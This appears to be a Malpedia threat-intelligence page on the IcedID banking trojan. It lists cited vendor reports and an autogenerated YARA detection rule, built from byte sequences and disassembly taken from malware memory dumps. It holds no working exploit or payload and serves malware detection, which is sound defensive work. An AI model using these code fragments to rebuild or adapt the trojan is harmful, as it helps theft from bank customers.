2018-04-10Cisco TalosRoss Gibb, Daphne Galme, Michael Gorelik
@online{gibb:20180410:icedid:f1a3ff2, author = {Ross Gibb and Daphne Galme and Michael Gorelik}, title = {{IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution}}, date = {2018-04-10}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html}, language = {English}, urldate = {2019-12-17} } IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID
2017-11-14Digital GuardianChris Brook
@online{brook:20171114:iceid:5a074d2, author = {Chris Brook}, title = {{IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites}}, date = {2017-11-14}, organization = {Digital Guardian}, url = {https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites}, language = {English}, urldate = {2019-07-10} } IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID
2017-11-13SecurityIntelligenceLimor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
@online{kessem:20171113:new:bb937fd, author = {Limor Kessem and Maor Wiesen and Tal Darsan and Tomer Agayev}, title = {{New Banking Trojan IcedID Discovered by IBM X-Force Research}}, date = {2017-11-13}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/}, language = {English}, urldate = {2019-11-27} } New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader
2017-11-13IntezerJay Rosenberg
@online{rosenberg:20171113:icedid:8dd9da4, author = {Jay Rosenberg}, title = {{IcedID Banking Trojan Shares Code with Pony 2.0 Trojan}}, date = {2017-11-13}, organization = {Intezer}, url = {http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/}, language = {English}, urldate = {2019-12-02} } IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader
Yara Rules
[TLP:WHITE] win_icedid_auto (20201023 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2020-12-22"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20201222"
        malpedia_hash = "30354d830a29f0fbd3714d93d94dea941d77a130"
        malpedia_version = "20201023"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { ff7500 56 ff15???????? 50 }
            // n = 4, score = 1400
            //   ff7500               | push                dword ptr [ebp]
            //   56                   | push                esi
            //   ff15????????         |                     
            //   50                   | push                eax

        $sequence_1 = { ff15???????? 8bf7 8bc6 eb02 33c0 5f 5e }
            // n = 7, score = 1300
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi

        $sequence_2 = { 6a00 ff15???????? 50 ff15???????? 8bc6 eb02 }
            // n = 6, score = 1300
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_3 = { 56 57 ff15???????? 50 ff15???????? 8bf7 8bc6 }
            // n = 7, score = 1300
            //   56                   | push                esi
            //   57                   | push                edi
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi

        $sequence_4 = { 0fb605???????? 50 0fb705???????? 50 51 }
            // n = 5, score = 1300
            //   0fb605????????       |                     
            //   50                   | push                eax
            //   0fb705????????       |                     
            //   50                   | push                eax
            //   51                   | push                ecx

        $sequence_5 = { 742c 803e00 7427 6a3b 56 ff15???????? 8bf8 }
            // n = 7, score = 1300
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax

        $sequence_6 = { ff15???????? 50 ff15???????? 8bf0 85f6 7502 }
            // n = 6, score = 1300
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf0                 | mov                 esi, eax
            //   85f6                 | test                esi, esi
            //   7502                 | jne                 4

        $sequence_7 = { be01000080 50 56 ff15???????? }
            // n = 4, score = 1300
            //   be01000080           | mov                 esi, 0x80000001
            //   50                   | push                eax
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_8 = { 0fbec0 03c8 46 8a06 }
            // n = 4, score = 1200
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi
            //   8a06                 | mov                 al, byte ptr [esi]

        $sequence_9 = { 50 ff15???????? eb0b 6a08 }
            // n = 4, score = 1200
            //   50                   | push                eax
            //   ff15????????         |                     
            //   eb0b                 | jmp                 0xd
            //   6a08                 | push                8

        $sequence_10 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_11 = { 8d4c2414 51 ff33 50 57 ff15???????? }
            // n = 6, score = 1000
            //   8d4c2414             | lea                 ecx, [esp + 0x14]
            //   51                   | push                ecx
            //   ff33                 | push                dword ptr [ebx]
            //   50                   | push                eax
            //   57                   | push                edi
            //   ff15????????         |                     

        $sequence_12 = { 740e 56 6a08 ffd3 50 ff15???????? }
            // n = 6, score = 900
            //   740e                 | je                  0x10
            //   56                   | push                esi
            //   6a08                 | push                8
            //   ffd3                 | call                ebx
            //   50                   | push                eax
            //   ff15????????         |                     

        $sequence_13 = { 8d5808 0fb713 8954241c 66c16c241c0c 0fb7d2 }
            // n = 5, score = 800
            //   8d5808               | lea                 ebx, [eax + 8]
            //   0fb713               | movzx               edx, word ptr [ebx]
            //   8954241c             | mov                 dword ptr [esp + 0x1c], edx
            //   66c16c241c0c         | shr                 word ptr [esp + 0x1c], 0xc
            //   0fb7d2               | movzx               edx, dx

        $sequence_14 = { 0132 47 83c302 3bfd }
            // n = 4, score = 800
            //   0132                 | add                 dword ptr [edx], esi
            //   47                   | inc                 edi
            //   83c302               | add                 ebx, 2
            //   3bfd                 | cmp                 edi, ebp

        $sequence_15 = { 3bfd 72c4 8b542414 0302 833800 759f }
            // n = 6, score = 800
            //   3bfd                 | cmp                 edi, ebp
            //   72c4                 | jb                  0xffffffc6
            //   8b542414             | mov                 edx, dword ptr [esp + 0x14]
            //   0302                 | add                 eax, dword ptr [edx]
            //   833800               | cmp                 dword ptr [eax], 0
            //   759f                 | jne                 0xffffffa1

        $sequence_16 = { 397820 7633 53 8bdf }
            // n = 4, score = 800
            //   397820               | cmp                 dword ptr [eax + 0x20], edi
            //   7633                 | jbe                 0x35
            //   53                   | push                ebx
            //   8bdf                 | mov                 ebx, edi

        $sequence_17 = { 8d5b11 83c414 47 3b7820 72d1 5b 33c0 }
            // n = 7, score = 800
            //   8d5b11               | lea                 ebx, [ebx + 0x11]
            //   83c414               | add                 esp, 0x14
            //   47                   | inc                 edi
            //   3b7820               | cmp                 edi, dword ptr [eax + 0x20]
            //   72d1                 | jb                  0xffffffd3
            //   5b                   | pop                 ebx
            //   33c0                 | xor                 eax, eax

        $sequence_18 = { 8b12 85d2 7454 8d6af8 d1ed 6a00 5f }
            // n = 7, score = 800
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56
            //   8d6af8               | lea                 ebp, [edx - 8]
            //   d1ed                 | shr                 ebp, 1
            //   6a00                 | push                0
            //   5f                   | pop                 edi

        $sequence_19 = { 6a1f 53 ff15???????? 8b4608 6a00 ff7618 }
            // n = 6, score = 700
            //   6a1f                 | push                0x1f
            //   53                   | push                ebx
            //   ff15????????         |                     
            //   8b4608               | mov                 eax, dword ptr [esi + 8]
            //   6a00                 | push                0
            //   ff7618               | push                dword ptr [esi + 0x18]

        $sequence_20 = { 8d442410 8364241000 50 53 ff15???????? }
            // n = 5, score = 700
            //   8d442410             | lea                 eax, [esp + 0x10]
            //   8364241000           | and                 dword ptr [esp + 0x10], 0
            //   50                   | push                eax
            //   53                   | push                ebx
            //   ff15????????         |                     

        $sequence_21 = { ff7604 51 52 ff15???????? }
            // n = 4, score = 700
            //   ff7604               | push                dword ptr [esi + 4]
            //   51                   | push                ecx
            //   52                   | push                edx
            //   ff15????????         |                     

        $sequence_22 = { ff7608 53 ff15???????? 85c0 }
            // n = 4, score = 700
            //   ff7608               | push                dword ptr [esi + 8]
            //   53                   | push                ebx
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax

        $sequence_23 = { 8a4173 a808 75f5 a804 7406 }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_24 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_25 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax

        $sequence_26 = { 7593 33ff 40 383b }
            // n = 4, score = 200
            //   7593                 | jne                 0xffffff95
            //   33ff                 | xor                 edi, edi
            //   40                   | inc                 eax
            //   383b                 | cmp                 byte ptr [ebx], bh

        $sequence_27 = { 41 57 48 83ec50 8be9 41 bd00000080 }
            // n = 7, score = 200
            //   41                   | inc                 ecx
            //   57                   | push                edi
            //   48                   | dec                 eax
            //   83ec50               | sub                 esp, 0x50
            //   8be9                 | mov                 ebp, ecx
            //   41                   | inc                 ecx
            //   bd00000080           | mov                 ebp, 0x80000000

        $sequence_28 = { 8b4110 33db 48 8bf9 395820 764b }
            // n = 6, score = 200
            //   8b4110               | mov                 eax, dword ptr [ecx + 0x10]
            //   33db                 | xor                 ebx, ebx
            //   48                   | dec                 eax
            //   8bf9                 | mov                 edi, ecx
            //   395820               | cmp                 dword ptr [eax + 0x20], ebx
            //   764b                 | jbe                 0x4d

        $sequence_29 = { ffc2 33d2 44 3b15???????? 72a7 48 }
            // n = 6, score = 200
            //   ffc2                 | inc                 edx
            //   33d2                 | xor                 edx, edx
            //   44                   | inc                 esp
            //   3b15????????         |                     
            //   72a7                 | jb                  0xffffffa9
            //   48                   | dec                 eax

        $sequence_30 = { 48 8d91db030000 48 8b89b9030000 eb0e }
            // n = 5, score = 200
            //   48                   | dec                 eax
            //   8d91db030000         | lea                 edx, [ecx + 0x3db]
            //   48                   | dec                 eax
            //   8b89b9030000         | mov                 ecx, dword ptr [ecx + 0x3b9]
            //   eb0e                 | jmp                 0x10

    condition:
        7 of them and filesize < 303104
}
Download all Yara Rules